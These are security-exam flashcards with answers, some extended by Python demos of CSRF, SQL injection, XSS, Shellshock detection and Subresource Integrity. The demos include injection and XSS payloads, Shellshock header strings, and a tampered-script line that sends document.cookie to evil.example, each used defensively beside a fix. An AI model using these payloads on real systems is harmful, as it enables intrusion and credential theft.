Day 1 76-114 Flashcards

1
Q

1.76 Which THREE of these are used for password cracking?

A. BTCrack
B. John the Ripper
C. KerbCrack
D. Nikto
E. Cain and Abel
F. Havij
A

Answer: B,C,E

John the Ripper, KerbCrack and Cain and Abel all recover passwords (from hashes, from captured Kerberos logons, and from sniffed or dumped credentials respectively). BTCrack cracks Bluetooth pairing PINs, Nikto is a web-server scanner and Havij is an automated SQL injection tool.

2
Q

1.77 On a Windows machine, what is the RID (the final component of the SID) of the built-in Administrator account?

A. 100
B. 412
C. 500
D. 999

A

Answer: C

The built-in Administrator account always has RID 500, so its SID ends in -500 regardless of what the account has been renamed to. Guest is RID 501, and ordinary local accounts are assigned RIDs from 1000 upward.

3
Q

1.78 Hacker Joe attacks a web page by entering unexpected data on the logon page. He then gains access to the database and displays the contents of the table that has usernames and passwords of other users. What is the problem here?

A. Insufficient security management
B. Insufficient exception handling
C. Insufficient database hardening
D. Insufficient input validation

A

Answer: D

This is SQL injection: the logon form passed whatever was typed straight into a database query, so unvalidated input was interpreted as SQL and let Joe read the whole user table.

4
Q

1.79 Which of these is a set of rules for people who handle electronic medical data?

A. FISMA
B. COBIT
C. HIPAA
D. ISO/IEC 27002

A

Answer: C

5
Q

1.80 You boot your computer up to find a pop-up message saying that illegal activity was detected, and your computer is now locked. The message also states that you must pay a fine to have your computer unlocked. You find that you cannot bypass this message and you are unable to use your computer at all. Which of these threats is this describing?

A. Riskware
B. Spyware
C. Adware
D. Ransomware

A

Answer: D

6
Q

1.81 While you are logged in to your bank using your web browser, you get an e-mail with a link to another website. You click the link and go to the second site where you see some funny videos. The next day, your bank sends you an e-mail saying your account has been accessed from China, and funds have been transferred there. Which of these web vulnerabilities was exploited to steal your funds?

A. Web form input validation
B. Clickjacking
C. Cross-Site Scripting
D. Cross Site Request Forgery

A

Answer: D

Your browser still held a valid bank session cookie. The second site made the browser send a request to the bank (a hidden form post or an image fetch is enough), and the browser attached the cookie automatically, so the bank could not tell that you never intended the transfer.
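The exchange above, as an added example that is not part of the original flashcard. The "bank" below is a small stand-in written for this note: the session table, the server secret and the request dictionaries are all constructed here. It shows why a handler that trusts only the session cookie is forged trivially, and how a per-session token that the attacker's page cannot read (the same-origin policy stops it reading the bank's page) defeats the same forged request.

```python
import hashlib
import hmac

# Constructed for this example: a server-side secret and one logged-in session.
SERVER_SECRET = b"example-server-secret-do-not-reuse"
SESSIONS = {"sess-abc123": {"user": "alice", "balance": 1000}}


def csrf_token_for(session_id: str) -> str:
    """Derive the per-session CSRF token the bank embeds in its own transfer form.
    A third-party page can make the browser *send* the session cookie, but it
    cannot *read* this value off the bank's page, so it cannot include it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(request: dict) -> str:
    """Checks only the session cookie, which the browser attaches to any
    request aimed at the bank, including ones another site triggered."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return "401 not logged in"
    session["balance"] -= int(request["form"]["amount"])
    return f"200 sent {request['form']['amount']} to {request['form']['to']}"


def transfer_protected(request: dict) -> str:
    """Also requires the token bound to the session; a forged cross-site POST lacks it."""
    session_id = request["cookies"].get("session")
    session = SESSIONS.get(session_id)
    if session is None:
        return "401 not logged in"
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token_for(session_id)):
        return "403 missing or invalid CSRF token"
    session["balance"] -= int(request["form"]["amount"])
    return f"200 sent {request['form']['amount']} to {request['form']['to']}"


def forged_request() -> dict:
    """What the 'funny videos' page makes the victim's browser send: the browser
    adds the bank cookie, but the page has no way to know the token."""
    return {"cookies": {"session": "sess-abc123"},
            "form": {"to": "attacker-acct", "amount": "500"}}


def legitimate_request() -> dict:
    """A submission from the bank's own form, which carries the token."""
    return {"cookies": {"session": "sess-abc123"},
            "form": {"to": "rent", "amount": "100",
                     "csrf_token": csrf_token_for("sess-abc123")}}


if __name__ == "__main__":
    print("vulnerable handler, forged request :", transfer_vulnerable(forged_request()))
    print("protected handler, forged request  :", transfer_protected(forged_request()))
    print("protected handler, real form       :", transfer_protected(legitimate_request()))
```

Marking the session cookie SameSite (Lax or Strict) is a second, independent control: the browser then withholds the cookie from cross-site requests in the first place.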

7
Q

1.82 The chance of a hard drive failure is once every four years. The cost to buy a new hard drive is $400. It will require 5 hours to restore the OS and software to the new hard disk. It will require another 5 hours to restore the user data from the last backup to the new hard disk. The recovery tech earns $10/hour. Calculate the SLE, ARO, and ALE. Assume the EF = 1 (100%).

What is the closest approximate cost of this replacement and recovery operation per year?

A. $100
B. $125
C. $500
D. $1500

A

Answer: B

SLE = replacement disk + labour = $400 + (5 h + 5 h) x $10/h = $500 (with EF = 1 the whole $500 is lost each time). ARO = 1 failure / 4 years = 0.25. ALE = SLE x ARO = $500 x 0.25 = $125 per year.

8
Q

1.83 An attacker wants to target your company with malware, so he compromises a web site your employees frequently visit. He hopes your users’ machines will become infected with the malware. Which type of attack is this?

A. Spear Phishing attack
B. Watering Hole attack
C. Heartbleed attack
D. Shellshock attack

A

Answer: B

9
Q

1.84 What is the process called that can record, log, and resolve events that happen in your company?

A. Metrics
B. Incident management process
C. Internal procedure
D. Security policy

A

Answer: B

10
Q

1.85 While doing a pen-test, you send the boss’s secretary an e-mail, changing the source to look like it came from the boss. You ask her for some links to relevant websites. She sends you the links via e-mail. You change them to links containing malware and send them back, telling her the links didn’t work. She tries the links herself and her machine gets infected, giving you access to it. Which testing method was used?

A. Piggybacking
B. Social engineering
C. Tailgating
D. Eavesdropping

A

Answer: B

11
Q

1.86 Which of the following describes an LM hash?
I - The maximum password length is 14 characters.
II - There are no distinctions between uppercase and lowercase.
III - It's a simple algorithm, so 10,000,000 hashes can be generated per second.

A. I
B. II
C. I and II
D. I, II, and III

A

Answer: D

LM converts the password to uppercase, pads or truncates it to 14 bytes and splits it into two 7-byte halves; each half is used as a DES key to encrypt the constant string KGS!@#$%. Because the halves are independent, a cracker attacks each as a separate 7-character uppercase password, which is why LM hashes fall so quickly. Windows Vista and later no longer store LM hashes by default.

12
Q

1.87 In which phase of incident-handling do you define processes/procedures/rules, and create and test back-up and response plans?

A. Preparation phase
B. Identification phase
C. Containment phase
D. Recovery phase

A

Answer: A

13
Q

1.88 Which technique provides ‘security through obscurity‘ by hiding secret messages within ordinary messages?

A. Encryption
B. RSA algorithm
C. Steganography
D. Public-Key cryptography

A

Answer: C

14
Q

1.89 While doing a pen-test, you find a hidden folder with the admin’s bank account username and password information. What should you do?

A. Do not report it and continue the penetration test
B. Report immediately to the administrator
C. Transfer money from the administrator’s account to another account
D. Do not transfer the money but steal the bitcoins

A

Answer: B

15
Q

1.90 Risks = threats x vulnerabilities x impact is referred to as the:

A. Risk equation
B. Threat assessment
C. Disaster recovery formula
D. BIA equation

A

Answer: A

16
Q

1.91 Which password cracking technique takes the longest time and most effort?

A. Dictionary attack
B. Shoulder surfing
C. Brute force
D. Rainbow tables

A

Answer: C

Brute force enumerates the entire keyspace, so it is guaranteed to succeed eventually but costs the most time. A dictionary attack tries only likely candidates, and rainbow tables trade a one-off precomputation for fast lookups (which is also why per-password salts defeat them).

17
Q

1.92 You find out your web site has some flaws, so to fix them you prevent users from entering HTML as input into the web site.
Which type of web flaw were you trying to fix?

A. Cross-site scripting vulnerability
B. Web site defacement vulnerability
C. SQL-injection vulnerability
D. Cross-site Request Forgery vulnerability

A

Answer: A

18
Q

1.93 Which is a typical method for exploiting the ShellShock vulnerability?

A. SYN Flood
B. Manipulate format strings in text fields
C. Through web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable to a vulnerable web server
D. SSH

A

Answer: C

Bash is the default shell on many Unix-like systems, and other programs (web servers, DHCP clients, SSH forced commands) launch it to run commands on their behalf, passing data to it in environment variables. Before the 2014 fix (CVE-2014-6271), bash treated any environment variable whose value began with "() {" as an exported function definition and kept parsing, and executing, whatever followed the function body. A CGI web server copies request headers such as User-Agent and Referer into environment variables before running a script, so a header value of the form "() { :;}; <command>" made a bash-backed CGI script run the attacker's command with the web server's privileges.
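Two checks a practitioner would run for this, as an added example that is not part of the original flashcard: scanning web-server access logs for the "() {" trigger in the header fields a CGI server exports, and the standard local self-test that exports a crafted function and sees whether bash runs the trailing command. The four log lines are constructed for this note (the addresses are documentation ranges, not real traffic); the last one shows why the check is anchored to the start of the value, which is where bash actually looked.

```python
import re
import subprocess

# Bash's original test was that the value begins with the four characters "() {".
# The anchored regex below tolerates extra whitespace, which is a detection choice.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$')

# Constructed sample lines (not real traffic). Lines 1 and 3 carry the trigger in a
# header a CGI server turns into an environment variable; line 4 merely contains
# "() {" mid-string, which bash never treated as a function.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'id'"
198.51.100.7 - - [25/Sep/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [25/Sep/2014:10:02:33 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { ignored; }; echo vulnerable" "curl/7.35.0"
192.0.2.9 - - [25/Sep/2014:10:03:01 +0000] "POST /cgi-bin/upload HTTP/1.1" 200 77 "-" "Mozilla/5.0 () { just a bracket"
"""


def find_shellshock_attempts(log_text: str) -> list:
    """Return one record per header field that starts with the bash function trigger."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        parts = m.group("request").split()
        path = parts[1] if len(parts) > 1 else ""
        for field in ("referer", "user_agent"):
            value = m.group(field)
            if SHELLSHOCK_RE.match(value):
                hits.append({"ip": m.group("ip"), "path": path,
                             "field": field, "value": value})
    return hits


def local_bash_is_vulnerable():
    """The classic self-check: export a crafted function and see whether bash executes
    the command after the function body. A patched bash prints only 'test' (and a
    warning on stderr). Returns None when bash is not installed."""
    try:
        proc = subprocess.run(["bash", "-c", "echo test"],
                              env={"x": "() { :;}; echo vulnerable"},
                              capture_output=True, text=True, timeout=5)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in proc.stdout


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['path']} via {hit['field']}: {hit['value']!r}")
    print("local bash vulnerable:", local_bash_is_vulnerable())
```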

19
Q

1.94 Hacker Joe stands outside the facility while talking on his phone. When an authorized employee walks by, swipes her badge, and enters the building, Joe grabs the door before it closes. What just happened?

A. Phishing
B. Whaling
C. Piggybacking
D. Masquerading

A

Answer: C

20
Q

1.95 Which of these is NOT one of the basic responses to risk?

A. Avoid
B. Delegate
C. Mitigate
D. Accept

A

Answer: B

The four standard risk responses are avoid, mitigate (reduce), transfer (for example, insurance) and accept. "Delegate" is not one of them.

21
Q

1.96 In 2014 a well-publicized vulnerability was found in the GNU Bash shell that would let an attacker run remote commands on a vulnerable system. What was this called?

A. Shellshock
B. Shellbash
C. Rootshock
D. Rootshell

A

Answer: A

22
Q

1.97 The CEO hired you to mitigate threats and vulnerabilities to the point that you have totally eliminated risk. What is one of the first things you should do?

A. Start the Wireshark application to start sniffing network traffic
B. Interview all employees in the company to rule out possible insider threats
C. Establish attribution to suspected attackers
D. Explain to the CEO that you cannot eliminate all risk, but you will be able to reduce risk to an acceptable level

A

Answer: D

23
Q

1.98 In Risk Management, how is the term “likelihood” related to the concept of “threat?”

A. Likelihood is a possible threat-source that may exploit a vulnerability
B. Likelihood is the probability that a vulnerability is a threat-source
C. Likelihood is the probability that a threat-source will exploit a vulnerability
D. Likelihood is the likely source of a threat that could exploit a vulnerability

A

Answer: C

24
Q

1.99 The Open Web Application Security Project (OWASP) is a community-driven effort to improve the security of web applications. What is the top item on their Top Ten most critical web security risks?

A. Injection
B. Cross Site Request Forgery
C. Cross Site Scripting
D. Path disclosure

A

Answer: A

Check out OWASP's top-10 list at https://www.owasp.org/index.php/Top10#OWASP_Top_10_for_2013
Injection is at the top of the 2013 list, and again in the 2017 edition. The 2021 edition moved Broken Access Control to #1 and Injection to #3, so check which edition an exam question refers to.

25
Q

1.100 All of these are Bluetooth attacks except for which?

A. Bluejacking
B. Bluesnarfing
C. Bluedriving
D. Bluesmacking

A

Answer: C

26
Q

1.101 Which of these could best describe SQL injection?

A. It is a Denial of Service attack
B. It is an attack used to gain unauthorized access to a database
C. It is an attack used to modify code in an application
D. It is a Man-In-The-Middle attack between your SQL server and web-app server

A

Answer: B
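The logon-page attack of 1.78 and the definition in 1.101, as an added example that is not part of the original flashcards. The in-memory SQLite table and its rows are constructed for this note (real systems store password hashes, not plaintext, but the question describes a plaintext table). The string-built query lets two classic inputs either dump every user or log in as a chosen account; the parameterized version sends the same inputs as bound values that the database never parses as SQL.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory user table with constructed sample rows (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "correct-horse"), ("bob", "hunter2"), ("admin", "s3cret!")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Builds the query by string formatting, so the attacker's text becomes SQL.
    Returns the matched rows; a non-empty result means 'logged in'."""
    query = (f"SELECT username, password FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same logic, but the values travel as bound parameters and are never parsed as SQL."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()


# Constructed attacker inputs.
DUMP_ALL = "' OR '1'='1"   # closes the quote and makes the WHERE clause always true
AS_ADMIN = "admin' --"     # closes the quote and comments out the password check

if __name__ == "__main__":
    db = build_db()
    # WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'  -> every row
    print("dump via vulnerable login:", login_vulnerable(db, DUMP_ALL, DUMP_ALL))
    # WHERE username = 'admin' --' AND password = 'wrong'          -> admin row
    print("admin via vulnerable login:", login_vulnerable(db, AS_ADMIN, "wrong"))
    print("same inputs, parameterized:", login_parameterized(db, DUMP_ALL, DUMP_ALL),
          login_parameterized(db, AS_ADMIN, "wrong"))
    print("real credentials, parameterized:", login_parameterized(db, "alice", "correct-horse"))
```

Input validation (rejecting quotes, limiting length) is useful defence in depth, but parameterized queries are the fix, because they remove the ambiguity between data and SQL rather than trying to filter it.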

27
Q

1.102 After finding and mitigating the vulnerabilities on your network, some small amount of risk still remains. What is this called?

A. Impact risk
B. Deferred risk
C. Residual risk
D. Inherent risk

A

Answer: C

28
Q

1.103 Which of these is an entity or event with the potential to harm a system through unauthorized access, theft, destruction, denial of service, or modification of data?

A. Risk
B. Threat
C. Attack
D. Vulnerability

A

Answer: B

29
Q

1.104 Which of these is the most “low-tech” method of accessing a system?

A. Scanning
B. Eavesdropping
C. Sniffing
D. Social engineering

A

Answer: D

30
Q

1.105 If you boot a Windows machine with an Ubuntu Live CD, which Linux command-line tool can change user passwords and activate disabled accounts in the SAM file of the Windows machine?

A. SET
B. CHNTPW
C. Cain & Abel
D. John the Ripper

A

Answer: B

chntpw edits the SAM registry hive offline, so it only works when the Windows volume is not encrypted (BitLocker blocks this route). Its own documentation recommends blanking the password rather than setting a new one, because a set password is not always accepted by Windows afterwards.

31
Q

1.106 Where should you store your backup tapes?
A. In a dry, cool environment
B. In a climate controlled facility off-site
C. Inside the data center for faster retrieval in a fireproof safe
D. On a different floor in the same building

A

Answer: B

32
Q

1.107 Which one of these would be the biggest threat involving backups?

A. An un-encrypted backup can be misplaced or stolen
B. A backup is unavailable during disaster recovery
C. A backup is the source of malware or illicit information
D. A backup is incomplete because no verification was performed

A

Answer: A

33
Q

1.108 An attacker infected your web server with a trojan. He can now use your server to send spam mail, and can also use it to join in coordinated attacks against targets he chooses. Which type of trojan would this be?

A. Turtle trojans
B. Botnet trojan
C. Banking trojan
D. Ransomware trojan

A

Answer: B

34
Q

1.109 Which of these would be the best way to prevent XSS (Cross-Site Scripting) in your application?

A. Validate and escape all information sent to a server
B. Verify access right before allowing access to protected information and UI controls
C. Use security policies and procedures to define and implement proper security settings
D. Use digital certificates to authenticate a server prior to sending data

A

Answer: A

Escaping (output encoding) converts the characters that are special in the output context, such as < > " ' and &, into their HTML entities so the browser renders them as text instead of parsing them as markup or script. Do it at the point of output and for the specific context (HTML body, attribute, JavaScript, URL), because input validation alone cannot anticipate every place the data will later be displayed.
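The escaping described here, and the reason it beats simply banning HTML in input (1.92), as an added example that is not part of the original flashcards. The comment-rendering functions and the two payloads are constructed for this note. The attribute case is the one people get wrong: escaping only < and > leaves a double quote that breaks out of a title="..." attribute and injects an event handler, so the example escapes with quote=True.

```python
import html

# Constructed attacker inputs: one for the HTML body, one that breaks out of an attribute.
PAYLOAD_BODY = "<script>alert(1)</script>"
PAYLOAD_ATTR = '" onmouseover="alert(1)'


def render_vulnerable(display_name: str, comment: str) -> str:
    """Inserts user input straight into the HTML, so the browser parses any tags in it."""
    return (f'<div class="comment"><a title="{display_name}">{display_name}</a>: '
            f'{comment}</div>')


def render_escaped(display_name: str, comment: str) -> str:
    """Escapes for the HTML body and for the quoted attribute (quote=True also
    converts " and ', which is what keeps the value inside the attribute)."""
    name = html.escape(display_name, quote=True)
    body = html.escape(comment, quote=True)
    return f'<div class="comment"><a title="{name}">{name}</a>: {body}</div>'


def has_active_markup(rendered: str) -> bool:
    """Crude demonstration check, not a real scanner: does the output still contain a
    script tag or an attribute-level event handler the browser would honour?"""
    return "<script" in rendered or ' onmouseover="' in rendered


if __name__ == "__main__":
    print(render_vulnerable("bob", PAYLOAD_BODY))
    print(render_escaped("bob", PAYLOAD_BODY))
    print(render_vulnerable(PAYLOAD_ATTR, "hi"))   # title="" onmouseover="alert(1)"
    print(render_escaped(PAYLOAD_ATTR, "hi"))      # title="&quot; onmouseover=&quot;alert(1)"
    # quote=False (the default in older code) leaves the quote intact: not enough for attributes.
    print(html.escape(PAYLOAD_ATTR, quote=False))
```

html.escape covers HTML body and attribute contexts only; data placed inside a script block or a URL needs the encoder for that context, which is why templating engines that auto-escape per context are preferred over hand-rolled calls.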

35
Q

1.110 Your website sells widgets to internet customers and your security team regularly verifies that the components of the website are safe. Later you add third-party JavaScript analytics tools to the site to track customer activity on your website. These scripts are loaded from the analytics company's servers. What's the main risk here?

A. There is no risk at all as the analytics services are trustworthy.
B. External scripts increase the outbound company data traffic which leads to greater financial loss.
C. External scripts have direct access to the company servers and can steal the data from there.
D. External scripts contents could be maliciously modified without the security team’s knowledge.

A

Answer: D
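The control that addresses this risk directly is Subresource Integrity (SRI): pin a digest of the reviewed script in the script tag, and the browser refuses to run the file if what it fetches no longer matches. Below is an added example that is not part of the original flashcard; the script body, and the analytics.example URL, are constructed placeholders. The last function reproduces the browser's check so you can see a modified copy being rejected.

```python
import base64
import hashlib
import hmac

# Constructed stand-in for the analytics vendor's file (not real vendor code).
VENDOR_SCRIPT = b"window.track=function(e){/* analytics */};\n"


def sri_integrity(body: bytes, algo: str = "sha384") -> str:
    """Value for the <script integrity="..."> attribute: the algorithm name, a dash,
    and the base64 digest of the exact bytes the browser will execute."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def script_tag(src: str, integrity: str) -> str:
    """SRI on a cross-origin script needs crossorigin so the browser is allowed to
    read the response body it is about to hash; the vendor must send CORS headers."""
    return f'<script src="{src}" integrity="{integrity}" crossorigin="anonymous"></script>'


def browser_would_execute(fetched: bytes, integrity: str) -> bool:
    """Mirror of the browser's check: hash what was actually fetched and compare it
    with the pinned value; on mismatch the browser blocks the script."""
    algo, _, expected = integrity.partition("-")
    actual = base64.b64encode(hashlib.new(algo, fetched).digest()).decode()
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    pinned = sri_integrity(VENDOR_SCRIPT)
    print(script_tag("https://analytics.example/track.js", pinned))
    tampered = VENDOR_SCRIPT + b"fetch('//evil.example',{method:'POST',body:document.cookie});"
    print("reviewed copy runs:", browser_would_execute(VENDOR_SCRIPT, pinned))
    print("modified copy runs:", browser_would_execute(tampered, pinned))
```

The caveat: SRI only works when the vendor serves a fixed file. Many analytics vendors update their script continuously, so the pinned digest breaks on the next release; in that case self-hosting a reviewed copy, or restricting what the script can do with a Content Security Policy, is the fallback.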

36
Q

1.111 One of your largest customers has placed a call into your IT department. The customer is asking about your network systems, infrastructure, and team. The customer has stated that they are considering possible integration options between your two companies. How should your IT employee respond to this request for information?

A. Since the company’s policy is all about customer service, he should provide the information.
B. The employee should not provide any information without previous management authorization.
C. The employee should just hang up.
D. The employee can not provide any information, but he should provide the name of the person in charge.

A

Answer: B

Even providing the name of the person in charge could be damaging, especially if the caller is not who he claims to be.

37
Q

1.112 What’s the name of the process where you determine the critical business processes, and the potential impacts when you lose their services?

A. Risk mitigation
B. Emergency Plan Response (EPR)
C. Disaster Recovery Planning (DRP)
D. Business Impact Analysis (BIA)

A

Answer: D

38
Q

1.113 What’s the correct term for the amount of risk left over after making all reasonable attempts at mitigating the risk by deploying countermeasures.

A. Inherent risk
B. Residual risk
C. Impact risk
D. Deferred risk

A

Answer: B

39
Q

1.114 What is the name of a type of virus that tries to install itself inside the file it’s infecting?

A. Polymorphic virus
B. Tunneling virus
C. Cavity virus
D. Stealth virus

A

Answer: C